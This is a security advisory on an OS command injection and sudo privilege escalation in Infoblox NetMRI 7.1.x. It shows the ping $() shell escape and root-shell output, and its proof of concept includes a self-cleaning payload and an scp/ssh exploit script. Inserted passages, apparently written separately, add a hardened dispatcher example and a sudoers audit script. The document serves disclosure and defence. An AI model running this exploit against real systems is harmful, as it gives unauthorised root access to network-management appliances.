
Infoblox NetMRI 7.1.4 Shell Escape / Privilege Escalation

25 Oct 2017, reported by Hank Leininger, via packetstormsecurity.com

Infoblox NetMRI 7.1.4 Shell Escape and Privilege Escalation vulnerability

Code
`KL-001-2017-017 : Infoblox NetMRI Administration Shell Escape and Privilege Escalation  
  
Title: Infoblox NetMRI Administration Shell Escape and Privilege Escalation  
Advisory ID: KL-001-2017-017  
Publication Date: 2017.10.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-017.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Infoblox  
Affected Product: NetMRI  
Affected Version: 7.1.2 - 7.1.4  
Platform: Embedded Linux  
CWE Classification: CWE-78: Improper Neutralization of Special Elements  
used in an OS Command ('OS Command Injection'),  
CWE-272: Least Privilege Violation  
Impact: Root Access  
Attack vector: SSH  
  
2. Vulnerability Description  
  
An authenticated user can escape the management shell and  
subsequently escalate to root via insecure file ownership and  
sudo permissions.  
  
3. Technical Description  
  
The attacker begins by logging into the NetMRI CLI using a  
previously acquired or default admin account credential.  
  
$ ssh [email protected]  
NetMRI VM-AD30-5C6CE  
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS.  
Last login: Mon Mar 13 15:04:37 2017 from 1.3.3.6  
  
************************************************************************  
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM  
EXTENT ALLOWED BY APPLICABLE LAWS.  
************************************************************************  
  
NetMRI Administrative Shell  
---------------------------  
  
Available Commands:  
acl          ftp               md5sum           register     setup  
autoupdate   grep              more             remoteCopy   show  
cat          halt              netstat          removedsb    snmpwalk  
clear        help              ping             removemib    ssh-key  
configure    installdsb        provisiondisk    repair       supportbundle  
debug        installhelpfiles  quit             reset        telnet  
deregister   installmib        rdtclient        restore      tftpsync  
diagnostic   license           reboot           rm           top  
exit         ls                recalculate-spm  route        traceroute  
export       maintenance       refreshgroups    set  
  
The argument to ping is evaluated by a Unix shell before ping runs, so an  
arbitrary command can be smuggled in with $() command substitution. In  
the case below, we simply call the bash binary.  
  
NetMRI-VM-AD30-5C6CE> ping $(/bin/bash)  
NOTE: Defaulting to MGMT network. Use -I to bind to a specific network...  
  
This drops us into an interactive bash. It runs as the unprivileged  
admin user, who has been granted a subset of commands via sudo rather  
than full root.  
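The bug class above, as an added example that is not code from the advisory or from Infoblox: a toy command dispatcher that re-parses its argument through the shell, beside a hardened version. NetMRI's real wrapper is not public, so vuln_ping is an assumed model of the observed behaviour, and safe_ping is the fix a reviewer would ask for; both names, and the use of echo in place of a real ping, are choices made for this example.

```shell
#!/bin/sh
# Added example, not code from the advisory or from Infoblox: a toy
# "administrative shell" dispatcher that shows the bug class above, beside
# a hardened version. NetMRI's real wrapper is not public; vuln_ping is an
# assumption modelled on the symptom (a $() argument to ping runs before
# ping does).

# Vulnerable: the user's argument is glued into a command string that is
# handed back to the shell. Command substitution in the argument is
# expanded by that shell before the wrapped command ever runs, so a target
# of '$(/bin/bash)' drops the caller into bash. 'echo' stands in for ping
# so the example runs offline.
vuln_ping() {
    eval "echo ping -c 1 $1"
}

# Hardened: accept only hostname/IPv4 characters and pass the argument as
# a single argv element, so nothing is re-parsed by a shell. '--' ends
# option parsing so a target such as '-I eth0' cannot smuggle flags either.
safe_ping() {
    target=$1
    case "$target" in
        ''|*[!A-Za-z0-9.-]*)
            echo "rejected: invalid target '$target'" >&2
            return 1 ;;
    esac
    echo ping -c 1 -- "$target"
}

# Stand-alone demo: the same hostile argument through both dispatchers.
vuln_ping '$(echo INJECTED)'      # prints: ping -c 1 INJECTED
safe_ping '$(echo INJECTED)' || true   # rejected
safe_ping 10.0.0.1                # prints: ping -c 1 -- 10.0.0.1
```

The point of the hardened form is not the character whitelist by itself but that the argument never travels through a shell again: the wrapper validates it and passes it as one argv element, so `$()`, backticks, `;` and `|` have no meaning at the point where they would otherwise be interpreted.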
  
The admin and netmri accounts are permitted to execute various  
system commands from /bin/ and /usr/bin/ with any arguments  
sufficient to trivially escalate to root access such as /bin/cp,  
/bin/chmod, /bin/mv, /usr/sbin/find, etc., as well as some  
vendor-specific programs under /tools/. These can be used to  
escalate to root by overwriting /etc/shadow, creating a setuid  
shell, etc.  
  
In addition, numerous commands in users' home directories can be  
executed as root via sudo, such as multiple /home/admin/*  
commands runnable by user admin, and /home/reset/FactoryReset for  
user reset. One such example is runTop. runTop is a script which  
resides in the home directory of the admin user.  
  
In order to escalate privileges to root using a sudo-able command  
in a user's home directory, an attacker can move the real file,  
then create a malicious replacement and call it using sudo:  
  
[admin@NetMRI-VM-AD30-5C6CE Backup]$ cd /home/admin  
[admin@NetMRI-VM-AD30-5C6CE ~]$ mv /home/admin/runTop /home/admin/runTop.orig  
[admin@NetMRI-VM-AD30-5C6CE ~]$ echo '#!/bin/bash' > /home/admin/runTop  
[admin@NetMRI-VM-AD30-5C6CE ~]$ echo /bin/bash >> /home/admin/runTop  
[admin@NetMRI-VM-AD30-5C6CE ~]$ chmod a+x /home/admin/runTop  
[admin@NetMRI-VM-AD30-5C6CE ~]$ sudo /home/admin/runTop  
  
Now we have root.  
  
[root@NetMRI-VM-AD30-5C6CE ~]# id;uname -a  
uid=0(root) gid=0(root) groups=0(root)  
Linux NetMRI-VM-AD30-5C6CE 3.14.25.osib.7.1.0.20160929 #1 SMP Thu Sep 29 12:50:42 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux  
[root@NetMRI-VM-AD30-5C6CE ~]#  
  
The users admin, netmri, and reset all have similar NOPASSWD  
sudoers entries for scripts and/or binaries which the privilege  
escalation can be performed against.  
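A check a practitioner would want after reading the above, as an added example that is not part of the advisory: a sudoers audit that flags NOPASSWD rules whose target the granted user owns or can replace, or which name a file-manipulation tool that is root on its own. The function names, the simplified sudoers grammar it parses, and the temporary directory tree it audits (built by demo_setup with constructed files) are all assumptions made for this example.

```shell
#!/bin/sh
# Added example, not part of the KoreLogic advisory: audit a sudoers file
# for the misconfiguration described above, i.e. a NOPASSWD rule whose
# target can be replaced by the very user the rule is granted to, or is a
# tool that yields root on its own. Assumes plain rules of the form
#   user host = (runas) NOPASSWD: /path [args], /path2
# Defaults lines, alias definitions and non-NOPASSWD rules are skipped.

# classify_path <sudo-user> <path> [fake-root]
# Echoes a reason when <path> is abusable by <sudo-user>, nothing otherwise.
# <fake-root> is prepended for filesystem checks so a constructed tree can
# be audited without touching the real system.
classify_path() {
    local user path real dir
    user=$1; path=$2; real="${3:-}$2"; dir=$(dirname "$real")
    # Tools that read or write arbitrary files as root are a root shell by
    # themselves (overwrite /etc/shadow, chmod u+s a copy of bash, ...).
    case "$(basename "$path")" in
        cp|mv|chmod|chown|find|tee|dd|sh|bash|vi|vim|perl|python*)
            echo "root-capable tool"; return 0 ;;
    esac
    # The target itself is owned by the sudo user or world-writable.
    if [ -e "$real" ] && [ -n "$(find "$real" -prune \( -user "$user" -o -perm -002 \) -print 2>/dev/null)" ]; then
        echo "target owned by or writable by the sudo user"; return 0
    fi
    # The containing directory is: the file can be moved aside and replaced,
    # exactly as with /home/admin/runTop above.
    if [ -d "$dir" ] && [ -n "$(find "$dir" -prune \( -user "$user" -o -perm -002 \) -print 2>/dev/null)" ]; then
        echo "parent directory owned by or writable by the sudo user"; return 0
    fi
    # Anything living under a home directory deserves a look regardless.
    case "$path" in /home/*) echo "lives under a home directory" ;; esac
    return 0
}

# audit_sudoers <sudoers-file> [fake-root]
# Prints  user<TAB>path<TAB>reason  per abusable rule; returns 1 if any found.
audit_sudoers() {
    local sudoers root found line user cmds cmd path reason oldifs
    sudoers=$1; root=${2:-}; found=0
    while IFS= read -r line; do
        case "$line" in ''|'#'*|Defaults*|*_Alias*) continue ;; esac
        case "$line" in *NOPASSWD:*) ;; *) continue ;; esac
        user=${line%%[[:space:]]*}
        cmds=${line##*NOPASSWD:}
        oldifs=$IFS; IFS=','; set -- $cmds; IFS=$oldifs
        for cmd in "$@"; do
            set -- $cmd            # default IFS: $1 is the path, rest are args
            path=$1
            [ -n "$path" ] || continue
            if [ "$path" = ALL ]; then
                reason="ALL commands"
            else
                reason=$(classify_path "$user" "$path" "$root")
            fi
            if [ -n "$reason" ]; then
                printf '%s\t%s\t%s\n' "$user" "$path" "$reason"
                found=1
            fi
        done
    done < "$sudoers"
    return "$found"
}

# demo_setup: build a constructed NetMRI-like tree under a temp dir and
# print its path. The sudo user is the current user so the ownership check
# is exercised without root. Every file and rule here is constructed.
demo_setup() {
    local root me
    root=$(mktemp -d); me=$(id -un)
    mkdir -p "$root/home/admin" "$root/home/reset" "$root/bin"
    printf '#!/bin/bash\nexec top -b -n 1\n' > "$root/home/admin/runTop"
    printf '#!/bin/bash\necho factory reset\n' > "$root/home/reset/FactoryReset"
    chmod 755 "$root/home/admin/runTop" "$root/home/reset/FactoryReset"
    : > "$root/bin/cp"
    cat > "$root/sudoers" <<EOF
Defaults    env_reset
Cmnd_Alias  TOOLS = /bin/cp, /bin/mv
# constructed rules modelled on the NOPASSWD pattern described above
$me   ALL=(root) NOPASSWD: /home/admin/runTop, /bin/cp
reset ALL=(root) NOPASSWD: /home/reset/FactoryReset
EOF
    echo "$root"
}

# Stand-alone run: audit the constructed tree, then clean it up.
demo_root=$(demo_setup)
audit_sudoers "$demo_root/sudoers" "$demo_root" || true
rm -rf "$demo_root"
```

Run against a real appliance the second argument is omitted and the first is /etc/sudoers (or a file from /etc/sudoers.d). Every hit is worth a look, but the first two reasons are the ones that matter here: a sudo target the user owns, or whose directory the user owns, is a root shell waiting for a mv and a chmod.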
  
4. Mitigation and Remediation Recommendation  
  
At the time of publication there is no known remediation of this  
vulnerability from the vendor. Administrators should heavily restrict  
access to any account, regardless of its privilege level, that can  
use the ping command in the NetMRI CLI.  
  
Network access to management interfaces should be properly  
segmented.  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
and Hank Leininger of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.07.21 - KoreLogic requests security contact and PGP key  
from Infoblox.  
2017.07.21 - Infoblox suggests '[email protected]'  
with PGP key id 0xC4AB2799.  
2017.07.24 - KoreLogic submits vulnerability information to Infoblox.  
2017.07.31 - 5 business days have elapsed since the vulnerability  
was reported. No response from Infoblox.  
2017.09.15 - KoreLogic requests update from Infoblox.  
2017.09.26 - 45 business days have elapsed since the vulnerability  
was reported to Infoblox.  
2017.10.17 - KoreLogic requests an update from Infoblox.  
2017.10.18 - 60 business days have elapsed since the vulnerability  
was reported to Infoblox.  
2017.10.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
Payload file (kept locally as netmri-privesc, uploaded to the target as .a)  
  
#!/bin/bash  
# Swap the sudo-able runTop script for one that runs a shell, execute it  
# as root, then put the original back and remove this payload.  
mv /home/admin/runTop /home/admin/runTop.orig  
echo '#!/bin/bash' > /home/admin/runTop  
echo /bin/bash >> /home/admin/runTop  
chmod a+x /home/admin/runTop  
sudo /home/admin/runTop  
/bin/rm -rf /home/admin/runTop  
mv /home/admin/runTop.orig /home/admin/runTop  
/bin/rm -rf /var/home/admin/chroot-home/Backup/.a  
  
Exploit bash script  
  
#!/bin/bash  
# Usage: ./exploit.sh <user> <host> <port>  
# Uploads the payload (local file netmri-privesc) to the target as ~/.a,  
# then triggers it through the ping $() escape in the NetMRI shell.  
[ $# -eq 3 ] || { echo "usage: $0 <user> <host> <port>" >&2; exit 1; }  
TARGET_USER=$1  
TARGET_HOST=$2  
TARGET_PORT=$3  
scp -P "$TARGET_PORT" netmri-privesc "$TARGET_USER@$TARGET_HOST:.a"  
ssh -p "$TARGET_PORT" "$TARGET_USER@$TARGET_HOST" 'ping $(/bin/bash .a)'  
  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`
